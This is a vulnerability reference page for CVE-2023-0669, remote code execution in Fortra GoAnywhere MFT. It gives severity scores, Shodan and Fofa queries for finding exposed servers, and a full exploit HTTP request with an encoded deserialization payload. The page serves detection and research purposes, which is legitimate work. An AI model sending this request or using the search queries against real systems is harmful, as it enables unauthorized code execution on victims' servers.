🔙 목록으로 돌아가기

CVE-2023-0669: Fortra GoAnywhere MFT - Remote Code Execution

TitleFortra GoAnywhere MFT - Remote Code Execution
Authorrootxharsh,iamnoooob,dhiyaneshdk,pdresearch
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
RemediationApply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
CVSS Score7.2
EPSS Score0.94378
CVE IDCVE-2023-0669
CWE IDCWE-502
Shodan Queryhttp.favicon.hash:1484947000http.favicon.hash:1484947000,1828756398,1170495932
Fofa Queryapp="goanywhere-mft"icon_hash=1484947000icon_hash=1484947000,1828756398,1170495932
Tags cve2023 cve rce goanywhere oast kev fortra vkev vuln

🔍 Vulnerability Description

Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet.

🌐 HTTP Request

POST /goanywhere/lic/accept HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 473
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

bundle=bwSv9a5HlP8zbGJ%2BjIT2%2BjpC4tKUCCj9ce8awLxcjt1HLXC51PtoCaw4np6FXKOH7v5EZHjMUuiVUSQxpCYm5R5adQVi1StdMA4JbCzv5CFaLnTUNwwq4QweKYkyBS1wI%2Bbby7McUou9nJKVgh3aIqQ7g9SnTo2uXzeBgDx38A%2FxD4gwrK4VwnIoou9KKTURyQmFtagT42eAgLT3bsUgIHb1oc6IV2EnDMAAafshdoCYa2bn5QnVXMcQQM5HoLB1FavZ5i6d3lfpWAIf%2FlwS0pCL96Q8MiUlb5Z4OkzYqxOHiKOq7pmFJ4BIZ6Oimgkmw2kiLecqwNhT6LJYepfg%2B5lYAdJO2qjuE1ov01JbJRI1G9ocZpJ1SU3%2Fg49GCd8qhgF6U5YPLQVKa62EENAdao%2FnmfcQmcemQ0EoFGSwXYgIdFGt8H8D6Og2b0mFemIw$2

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-0669.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-0669.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A